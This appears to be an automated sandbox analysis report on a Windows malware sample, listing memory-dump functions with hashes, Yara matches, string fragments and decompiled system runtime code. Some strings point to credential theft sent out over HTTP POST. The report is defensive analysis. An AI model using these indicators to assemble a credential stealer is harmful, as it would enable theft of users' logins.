                                  • Opcode Fuzzy Hash: c2aa1e1ecd2007c323d5ae8114c62d9ea82b76c4751e21a2193a172b1dc2cbf6
                                  • Instruction Fuzzy Hash: 96911DB5D00349AFDB50DFA4CC86FEFBBB8AF48700F104559F518A7242E7B49A058BA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00085342, Relevance: 6.5, Strings: 5, Instructions: 242COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415891175.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: $.$e$n$v
                                  • API String ID: 0-1849617553
                                  • Opcode ID: 3bce8432bb53f69dff89f782d383d0ac43fea380d39fc037f4eec24d0fb34a96
                                  • Instruction ID: d3113fc847bb01ce51d9c51c5343bdb91f17216c29089d9f30ef29897a2a9a74
                                  • Opcode Fuzzy Hash: 3bce8432bb53f69dff89f782d383d0ac43fea380d39fc037f4eec24d0fb34a96
                                  • Instruction Fuzzy Hash: EF718531618B498FD758EF68C4896EAB7F1FF54305F00062EE48AC7262EF71E9458B85
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00080C1B, Relevance: 6.5, Strings: 5, Instructions: 203COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415891175.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: 2.dl$dll$l32.$ole3$shel
                                  • API String ID: 0-1970020201
                                  • Opcode ID: 9d61d245234966bc0c1a3fe91fc62a54b654ecd7c9218b0b933f7742d7c1c682
                                  • Instruction ID: 0956ef030c3c7b9253dd8854a53f19fa5e71a93eed5788acc0640ee0fdf5aa5a
                                  • Opcode Fuzzy Hash: 9d61d245234966bc0c1a3fe91fc62a54b654ecd7c9218b0b933f7742d7c1c682
                                  • Instruction Fuzzy Hash: A7715DB0918B4C8FDB94EF64C045AEEB7E1FF58300F40462EE49AD7205EF30A5458B89
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000B8840, Relevance: 6.4, Strings: 5, Instructions: 175COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: Expl$GET$Windows Expl$Windows Expl$rer
                                  • API String ID: 0-314038199
                                  • Opcode ID: 1b6f0c81888b4b1b63cc09b268f06bd435d36fea290a5276130dbe15d4788aee
                                  • Instruction ID: cea4296da33ef3231e7594cd6021ad55c8750b73977f43a578c9210ceba432b2
                                  • Opcode Fuzzy Hash: 1b6f0c81888b4b1b63cc09b268f06bd435d36fea290a5276130dbe15d4788aee
                                  • Instruction Fuzzy Hash: 7B519671A40209BBEB20DF54DC82FFE77B8EB45704F144059FE086B282E774AA51CBA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00080C22, Relevance: 6.4, Strings: 5, Instructions: 175COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415891175.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: 2.dl$dll$l32.$ole3$shel
                                  • API String ID: 0-1970020201
                                  • Opcode ID: 830692af89c2490d7b4368e454bf1d0c02c7517312ce2975cee6e76b39767e0b
                                  • Instruction ID: 39516a29f179efad873806b480e264e1de44b7ba4819679a6a8d4a24447cc083
                                  • Opcode Fuzzy Hash: 830692af89c2490d7b4368e454bf1d0c02c7517312ce2975cee6e76b39767e0b
                                  • Instruction Fuzzy Hash: 8D515DB0918B4C8FDB54EFA4C045AEEB7F1FF58300F40462EA49AE7215EF3095458B99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00081860, Relevance: 6.4, Strings: 5, Instructions: 157COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415891175.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: 4$\$dll$ion.$vers
                                  • API String ID: 0-1610437797
                                  • Opcode ID: 5e47e1e15cee6cbc846e9419a9f6f1f28e676b448bd6b16d5c66a9d5d73fed2f
                                  • Instruction ID: 98e4dbf7a4f90ba0372344fe8cd17168875c3762761e5b772386de3d4d64c6c3
                                  • Opcode Fuzzy Hash: 5e47e1e15cee6cbc846e9419a9f6f1f28e676b448bd6b16d5c66a9d5d73fed2f
                                  • Instruction Fuzzy Hash: C6414030619B888BCBB9EF64D8457EA77E5FF98301F40462E988EC7241DF30D5458782
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000B8A40, Relevance: 6.4, Strings: 5, Instructions: 152COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: */*$POST$POST$Windows Expl$rer
                                  • API String ID: 0-1278404498
                                  • Opcode ID: f12aef5bf78a3f618af6104860a5b5e1f0ee71d21e3bc1cf4f4001a83702a766
                                  • Instruction ID: 56e7d3525ec65294be83e29fb4303fb5ee486fea62caecccff371cfc17dbcac6
                                  • Opcode Fuzzy Hash: f12aef5bf78a3f618af6104860a5b5e1f0ee71d21e3bc1cf4f4001a83702a766
                                  • Instruction Fuzzy Hash: C95174B1D00249BFEB11DFA4DC42FEE77B8AF45304F044159F509AB282E7705A54CBA6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000834A2, Relevance: 6.4, Strings: 5, Instructions: 149COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415891175.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: 32.d$cli.$dll$sspi$user
                                  • API String ID: 0-327345718
                                  • Opcode ID: 6419c24cbf138628b6a8febf79bff5f1e4a7bf40373ab0f5f0bb5e9242ee0d47
                                  • Instruction ID: 625be75b6ea2aee39d901106f38089a799b3686ad34e490ca2b3fc85582b2d20
                                  • Opcode Fuzzy Hash: 6419c24cbf138628b6a8febf79bff5f1e4a7bf40373ab0f5f0bb5e9242ee0d47
                                  • Instruction Fuzzy Hash: CF418F70A18E0D8FCB94FF68C0957ED77E1FB98700F44456AE88DD7201DA35DA408B85
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000B389C, Relevance: 6.4, Strings: 5, Instructions: 129COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: P$]$r$s$w
                                  • API String ID: 0-4062490325
                                  • Opcode ID: 6fb782c07cdb342b2f88ecbb5dcc9879328bef36ded6bfdd1680d3a8bea5c0a7
                                  • Instruction ID: f9576af5e453dc4e05e607fb5cb5b8cbb09849d7fe5e3b7ceebf38362a56c260
                                  • Opcode Fuzzy Hash: 6fb782c07cdb342b2f88ecbb5dcc9879328bef36ded6bfdd1680d3a8bea5c0a7
                                  • Instruction Fuzzy Hash: 3E513AB5D00348AFDB20DFA4D881BDEBBF5EF48700F14412EE919AB242E775A605CB95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000A6260, Relevance: 6.4, Strings: 5, Instructions: 120COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 4$dll$ion.$ion.dll$vers
                                  • API String ID: 0-4275468499
                                  • Opcode ID: 0cbf8fd1512fca162ce08393d244feec180effcf885e59fc00f313af5555fe5a
                                  • Instruction ID: 14066517e324c4e6b0f8dbffa91e207f03f87ab154bb210309073fd6bebb9fc9
                                  • Opcode Fuzzy Hash: 0cbf8fd1512fca162ce08393d244feec180effcf885e59fc00f313af5555fe5a
                                  • Instruction Fuzzy Hash: 48418F72900219ABDF20DFE5CC81FEFB7BCEF45740F044159F918AA181DA71AA14DBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000B8837, Relevance: 6.3, Strings: 5, Instructions: 92COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: Expl$GET$Windows Expl$Windows Expl$rer
                                  • API String ID: 0-314038199
                                  • Opcode ID: 5fe831344b19e5efc9c42c6721e1837dbd232665f7ac5ccfd8108907100c5bbf
                                  • Instruction ID: b1bdb275b994be03df149a416d3c5abf9bb520b42ca7980cf9dc47b94afe3e59
                                  • Opcode Fuzzy Hash: 5fe831344b19e5efc9c42c6721e1837dbd232665f7ac5ccfd8108907100c5bbf
                                  • Instruction Fuzzy Hash: EB319371A41219BBEB209E518C42FEF7BB8EB45B04F144155F6047B2C2D7B06A51CBE6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000A3BC6, Relevance: 6.3, Strings: 5, Instructions: 69COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 1$4.1$:$:$FBNG
                                  • API String ID: 0-4197480871
                                  • Opcode ID: 07b5432cbe03a37df7f3e502da2d033798e3e5ac8479001c116cff78a497441b
                                  • Instruction ID: 67205ce0936b5f62628a4c1492b9f884e2403456be459589016cfc1d74544f4d
                                  • Opcode Fuzzy Hash: 07b5432cbe03a37df7f3e502da2d033798e3e5ac8479001c116cff78a497441b
                                  • Instruction Fuzzy Hash: A92106B5E102599EDBA0DFA8C901BDEB7F8EF48304F1051AAE40CE7242EB711A85CB55
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000B72E0, Relevance: 6.3, Strings: 5, Instructions: 62COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: Us$: $er-A$gent$urlmon.dll
                                  • API String ID: 0-1367105278
                                  • Opcode ID: 184153eb36e171d3392621ca07b8cbf372f0cb497445b0b5819af74d026556e4
                                  • Instruction ID: a0f52c4d66b4a28058ad033c43f4722de5ccef2c5dfdc7c6da1c64c43ddf6f80
                                  • Opcode Fuzzy Hash: 184153eb36e171d3392621ca07b8cbf372f0cb497445b0b5819af74d026556e4
                                  • Instruction Fuzzy Hash: 66118EB1E01219AADB00DE959C02BEEBBB8AB45714F000059EC04AA241E2B45B0187E6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000B7D70, Relevance: 6.3, Strings: 5, Instructions: 62COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: $auth pass user $login auth pass user $pass user $user
                                  • API String ID: 0-3872547547
                                  • Opcode ID: 8ca2fdafd717bcec460f6dbac541fe7b301b615a757176f560040536c31fdb57
                                  • Instruction ID: b1ff5819d9a0a94928ccf59a87fba71fe70ae53e0bc37ebd828d3db8da44828b
                                  • Opcode Fuzzy Hash: 8ca2fdafd717bcec460f6dbac541fe7b301b615a757176f560040536c31fdb57
                                  • Instruction Fuzzy Hash: CA117072C14219A6DB00DFA9AC41AFFB7BCEF96354F004159EC04AA246F3715715C7E2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000B72DE, Relevance: 6.3, Strings: 5, Instructions: 55COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: Us$: $er-A$gent$urlmon.dll
                                  • API String ID: 0-1367105278
                                  • Opcode ID: 484dd7ff7f129f0e4de6493c058ca4a2a4b7b2c9e8d14aec7dd50e1cd044d5df
                                  • Instruction ID: 10e611cbc5ded3fa058df9352d5f60ddf57f0932ecf937a02f44ad477a20ed6b
                                  • Opcode Fuzzy Hash: 484dd7ff7f129f0e4de6493c058ca4a2a4b7b2c9e8d14aec7dd50e1cd044d5df
                                  • Instruction Fuzzy Hash: 531191B1D01249ABEB10DF94DD02BFEBBB8AF41B04F140059F804BB281D3B55B018BA6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00083498, Relevance: 6.3, Strings: 5, Instructions: 55COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415891175.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: 32.d$cli.$dll$sspi$user
                                  • API String ID: 0-327345718
                                  • Opcode ID: a8cf342f6b6a7f3ac171f7c2a3a26b59383ac57db5d10b76e195e5f82cfb2098
                                  • Instruction ID: 7e565cc8996457f240076ddc51e03b99f5a3d298341160e3e5df2599df103159
                                  • Opcode Fuzzy Hash: a8cf342f6b6a7f3ac171f7c2a3a26b59383ac57db5d10b76e195e5f82cfb2098
                                  • Instruction Fuzzy Hash: 8D112E71818A0CDFDB54EF58C4863AD77F1FF68305F00406FE848E7221DA7182548B89
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1E3D645B, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 26%
                                  			E1E3D645B(void* __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v36;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v60;
				char _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t48;
				intOrPtr _t49;
				intOrPtr _t50;
				intOrPtr* _t52;
				char _t56;
				void* _t69;
				char _t72;
				void* _t73;
				intOrPtr _t75;
				intOrPtr _t79;
				void* _t82;
				void* _t84;
				intOrPtr _t86;
				void* _t88;
				signed int _t90;
				signed int _t92;
				signed int _t93;

				_t80 = __edx;
				_t92 = (_t90 & 0xfffffff8) - 0x4c;
				_v8 =  *0x1e49d360 ^ _t92;
				_t72 = 0;
				_v72 = __edx;
				_t82 = __ecx;
				_t86 =  *((intOrPtr*)(__edx + 0xc8));
				_v68 = _t86;
				E1E3EFA60( &_v60, 0, 0x30);
				_t48 =  *((intOrPtr*)(_t82 + 0x70));
				_t93 = _t92 + 0xc;
				_v76 = _t48;
				_t49 = _t48;
				if(_t49 == 0) {
					_push(5);
					 *((char*)(_t82 + 0x6a)) = 0;
					 *((intOrPtr*)(_t82 + 0x6c)) = 0;
					goto L3;
				} else {
					_t69 = _t49 - 1;
					if(_t69 != 0) {
						if(_t69 == 1) {
							_push(0xa);
							goto L3;
						} else {
							_t56 = 0;
						}
					} else {
						_push(4);
						L3:
						_pop(_t50);
						_v80 = _t50;
						if(_a4 == _t72 && _t86 != 0 && _t50 != 0xa &&  *((char*)(_t82 + 0x6b)) == 1) {
							E1E3C2280(_t50, _t86 + 0x1c);
							_t79 = _v72;
							 *((intOrPtr*)(_t79 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
							 *((intOrPtr*)(_t79 + 0x88)) =  *((intOrPtr*)(_t82 + 0x68));
							 *((intOrPtr*)(_t79 + 0x8c)) =  *((intOrPtr*)(_t82 + 0x6c));
							 *((intOrPtr*)(_t79 + 0x90)) = _v80;
							 *((intOrPtr*)(_t79 + 0x20)) = _t72;
							E1E3BFFB0(_t72, _t82, _t86 + 0x1c);
						}
						_t75 = _v80;
						_t52 =  *((intOrPtr*)(_v72 + 0x20));
						_t80 =  *_t52;
						_v72 =  *((intOrPtr*)(_t52 + 4));
						_v52 =  *((intOrPtr*)(_t82 + 0x68));
						_v60 = 0x30;
						_v56 = _t75;
						_v48 =  *((intOrPtr*)(_t82 + 0x6c));
						asm("movsd");
						_v76 = _t80;
						_v64 = 0x30;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						if(_t80 != 0) {
							 *0x1e49b1e0(_t75, _v72,  &_v64,  &_v60);
							_t72 = _v76();
						}
						_t56 = _t72;
					}
				}
				_pop(_t84);
				_pop(_t88);
				_pop(_t73);
				return E1E3EB640(_t56, _t73, _v8 ^ _t93, _t80, _t84, _t88);
			}


































                                  0x1e3d645b
                                  0x1e3d6463
                                  0x1e3d646d
                                  0x1e3d6475
                                  0x1e3d647a
                                  0x1e3d647e
                                  0x1e3d6480
                                  0x1e3d648c
                                  0x1e3d6490
                                  0x1e3d6495
                                  0x1e3d6498
                                  0x1e3d649b
                                  0x1e3d649f
                                  0x1e3d64a1
                                  0x1e417c07
                                  0x1e417c09
                                  0x1e417c0c
                                  0x00000000
                                  0x1e3d64a7
                                  0x1e3d64a7
                                  0x1e3d64aa
                                  0x1e417bf7
                                  0x1e417c00
                                  0x00000000
                                  0x1e417bf9
                                  0x1e417bf9
                                  0x1e417bf9
                                  0x1e3d64b0
                                  0x1e3d64b0
                                  0x1e3d64b2
                                  0x1e3d64b2
                                  0x1e3d64b3
                                  0x1e3d64ba
                                  0x1e3d6553
                                  0x1e3d655e
                                  0x1e3d6566
                                  0x1e3d656c
                                  0x1e3d6575
                                  0x1e3d657f
                                  0x1e3d6585
                                  0x1e3d6588
                                  0x1e3d6588
                                  0x1e3d64c7
                                  0x1e3d64cb
                                  0x1e3d64ce
                                  0x1e3d64d3
                                  0x1e3d64da
                                  0x1e3d64e5
                                  0x1e3d64ed
                                  0x1e3d64f1
                                  0x1e3d64f5
                                  0x1e3d64f6
                                  0x1e3d64fa
                                  0x1e3d6502
                                  0x1e3d6503
                                  0x1e3d6504
                                  0x1e3d6507
                                  0x1e3d651a
                                  0x1e3d6524
                                  0x1e3d6524
                                  0x1e3d6526
                                  0x1e3d6526
                                  0x1e3d64aa
                                  0x1e3d652c
                                  0x1e3d652d
                                  0x1e3d652e
                                  0x1e3d6539

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.421351071.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                  • Associated: 0000000C.00000002.421631214.000000001E49B000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000C.00000002.421651645.000000001E49F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: 0$0
                                  • API String ID: 3446177414-203156872
                                  • Opcode ID: 20bc853a84277132374955895b7c341da4cc5cafe673f5ac046e4063079f8400
                                  • Instruction ID: c6ce05866ed0a428c24516c3888f241f737f9b2715814094d67d7a417fdcff41
                                  • Opcode Fuzzy Hash: 20bc853a84277132374955895b7c341da4cc5cafe673f5ac046e4063079f8400
                                  • Instruction Fuzzy Hash: 52415BB26047469FC301CF28C484A1ABBE5BB8D714F454A6EF899DB301D731EA49CB96
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00082322, Relevance: 5.3, Strings: 4, Instructions: 315COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415891175.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: 0$AWAV$Ic$VWUS
                                  • API String ID: 0-661394024
                                  • Opcode ID: c2eee98a4414dc011e95a67bd2f23515dd289af076a230c065391e938dbfd885
                                  • Instruction ID: 9e748987122ead4dc58edc6335c80f334f7c68bdd10f1cf53d25ac8aa6ce15e3
                                  • Opcode Fuzzy Hash: c2eee98a4414dc011e95a67bd2f23515dd289af076a230c065391e938dbfd885
                                  • Instruction Fuzzy Hash: 14A1B2704087488FDB64EF98D4456EEB7E4FF94304F10061EE8DAD7252EBB4D9458B86
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1E43FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 53%
                                  			E1E43FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E1E3ECE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E1E435720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E1E435720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                  0x1e43fdda
                                  0x1e43fde2
                                  0x1e43fde5
                                  0x1e43fdec
                                  0x1e43fdfa
                                  0x1e43fdff
                                  0x1e43fe0a
                                  0x1e43fe0f
                                  0x1e43fe17
                                  0x1e43fe1e
                                  0x1e43fe19
                                  0x1e43fe19
                                  0x1e43fe19
                                  0x1e43fe20
                                  0x1e43fe21
                                  0x1e43fe22
                                  0x1e43fe25
                                  0x1e43fe40

                                  APIs
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1E43FDFA
                                  Strings
                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 1E43FE01
                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 1E43FE2B
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.421351071.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                  • Associated: 0000000C.00000002.421631214.000000001E49B000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000C.00000002.421651645.000000001E49F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                  • API String ID: 885266447-3903918235
                                  • Opcode ID: 8c4dd5c18a6f453816f1360b50a81c1f370b25123c3af78329026e1c4b690587
                                  • Instruction ID: d0965ee7a8980bc73e418a959f569537691f8a2ee80af317fb6936aed78332d2
                                  • Opcode Fuzzy Hash: 8c4dd5c18a6f453816f1360b50a81c1f370b25123c3af78329026e1c4b690587
                                  • Instruction Fuzzy Hash: 22F0F636500551BFDB200A45EC02F63BB5AEB88731F250316F668566E1DB62F86096F0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000B7F40, Relevance: 5.2, Strings: 4, Instructions: 233COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: :$Port:User :$Server:$User :
                                  • API String ID: 0-1282517814
                                  • Opcode ID: b5cf737cf04e5ee9bd95c82aee2b7296089d0c978e5a988fa689a0cb30c85e8c
                                  • Instruction ID: 30bf9878fb8c6f51f1ebeb9f5308f37d75fe494fd42af1cf03bb7b7ef61ecff6
                                  • Opcode Fuzzy Hash: b5cf737cf04e5ee9bd95c82aee2b7296089d0c978e5a988fa689a0cb30c85e8c
                                  • Instruction Fuzzy Hash: 8D813FB280120CABCF51DB94CC91DDF77BCEF58210F00899AF14A66106EF75E6888BE5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000A4B20, Relevance: 5.2, Strings: 4, Instructions: 177COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: .$D$\$x
                                  • API String ID: 0-3596669699
                                  • Opcode ID: 75254b51869ae763b8929788a0c2fce695b126924fc71c8889935280f095ce96
                                  • Instruction ID: 739137aed9e153a8dd63ad3801ef6912ea5c01f18674833e289cdfc0787ce47a
                                  • Opcode Fuzzy Hash: 75254b51869ae763b8929788a0c2fce695b126924fc71c8889935280f095ce96
                                  • Instruction Fuzzy Hash: 8151A7B19502187AE750DF949C42FFF73ACDF89314F004159FA09A6182EBF56A44CBA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000B38A0, Relevance: 5.2, Strings: 4, Instructions: 164COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: P$r$s$w
                                  • API String ID: 0-3891800351
                                  • Opcode ID: 9e23544d75e4668bb96a475e1ea1923cbbf99177961e08a67f651eca5194034a
                                  • Instruction ID: db5aab7c5a79df559f92c0e6f3305c240771f79712d7af5e65962346ba5176fb
                                  • Opcode Fuzzy Hash: 9e23544d75e4668bb96a475e1ea1923cbbf99177961e08a67f651eca5194034a
                                  • Instruction Fuzzy Hash: 555132B5D00208AFDB50DFA4C881BEEBBF5EF48710F24456DE919EB242E7749A04CB95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000B7F3A, Relevance: 5.2, Strings: 4, Instructions: 161COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: :$Port:User :$Server:$User :
                                  • API String ID: 0-1282517814
                                  • Opcode ID: 19ff206c130d30be9dc8a6bd6767ead6447ff2bc43abf34ddf4788015ed885b8
                                  • Instruction ID: 1deb40e41173bbdab688e5e6257941fba3b2a150f0383b65922cdef5856f8fdf
                                  • Opcode Fuzzy Hash: 19ff206c130d30be9dc8a6bd6767ead6447ff2bc43abf34ddf4788015ed885b8
                                  • Instruction Fuzzy Hash: F35104B2801209ABCF51DBA4CC81DDF77BCEF58314F048999F54A66102EE75E6888BE5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00081422, Relevance: 5.1, Strings: 4, Instructions: 143COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415891175.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: .dll$el32$h$kern
                                  • API String ID: 0-4264704552
                                  • Opcode ID: ae282cd6d486f701958709f62c854dae402e44c06a0a478616d5972fc3258da0
                                  • Instruction ID: 8aa6d92d7d99cf8f939bee66ddb8aab0253f05775dd929573ff9723aed7227c2
                                  • Opcode Fuzzy Hash: ae282cd6d486f701958709f62c854dae402e44c06a0a478616d5972fc3258da0
                                  • Instruction Fuzzy Hash: FC416270608B498FD7A8EF69C4843EAB7E5FF98300F544A2E949EC3256DB70C945CB81
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000A95F8, Relevance: 5.1, Strings: 4, Instructions: 134COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: E$M$N$U
                                  • API String ID: 0-146571782
                                  • Opcode ID: 422c38e7e50b2b6f4276ee296822ed77f706cd6f418411a3dd8edee349b63bd0
                                  • Instruction ID: 54b70639a1454b6a504127866e87c7bec2e1e24a388f95fedbee6c3d34925c3d
                                  • Opcode Fuzzy Hash: 422c38e7e50b2b6f4276ee296822ed77f706cd6f418411a3dd8edee349b63bd0
                                  • Instruction Fuzzy Hash: A041E4B5EC530876EB25AAA0AC47FEF726C9F22704F004845FA09A61C3F6B15F1946A1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000A9600, Relevance: 5.1, Strings: 4, Instructions: 133COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: E$M$N$U
                                  • API String ID: 0-146571782
                                  • Opcode ID: 2d144dca8e2fb9c2f50649e6d365d30c44366d9b7f69b28011654fcc54814e6b
